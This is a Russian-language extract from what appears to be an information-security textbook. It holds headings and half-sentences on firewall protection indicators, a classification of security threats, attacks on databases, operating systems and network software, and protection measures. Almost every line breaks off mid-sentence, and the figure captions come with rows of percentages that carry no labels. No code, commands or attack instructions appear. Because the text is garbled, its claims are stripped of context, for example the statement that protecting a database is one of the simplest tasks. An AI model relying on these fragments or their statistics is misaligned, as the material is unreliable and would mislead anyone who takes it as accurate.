Рис. 5. Минимальные требования для обработки информации ограничен-

1.6.2. Показатели защищенности межсетевых экранов

В руководящем документе Гостехкомиссии России: “Руководящий

1.7. Классификация угроз безопасности информации

УГРОЗЫ БЕЗОПАСНОСТИ ИНФОРМАЦИИ

Отказы технических средств и Внутренние

Рис. 6. Классификация угроз безопасности информации

Рис. 7. Уязвимые места АС

1.8. Основные методы нарушения конфиденциальности,

1.9. Атаки на автоматизированные системы

1.9.1. Атаки на уровне систем управления базами данных

Защита СУБД является одной из самых простых задач. Это связано

Основные методы реализации угроз информационной безопасности

Определение Визуальное Внесение иска- Искажение со-

Однако в случае, если используется СУБД, не имеющая достаточно

Защищать операционную систему, в отличие от СУБД, гораздо

Общее количество известных успешных атак для различных ОС

Рис. 8. Статистика соотношения угроз для различных ОС

Вследствие того, что большинство атак для операционных систем,

Рис. 9. Статистика соотношения угроз для семейств ОС

6% 32% 4% 27% 5% 9% 12% 5%

Рис. 10. Соотношение групп атак для ОС семейства Windows

39% 2% 4% 24% 3% 7% 8% 13%

Угрозы, позволяющие несанкционированно запустить исполняемый

1.9.3. Атаки на уровне сетевого программного обеспечения

Сетевое программное обеспечение является наиболее уязвимым,

2.2. Задачи системы защиты информации и меры их ре-

Рис. 12. Взаимосвязь мер обеспечения безопасности

2.3. Методы и средства обеспечения информационной

2.3.1. Формальные средства защиты

Формальными называются такие средства защиты, которые вы-

Рассмотрим подробнее формальные средства обеспечения инфор-

2.3.2. Программные средства обеспечения информационной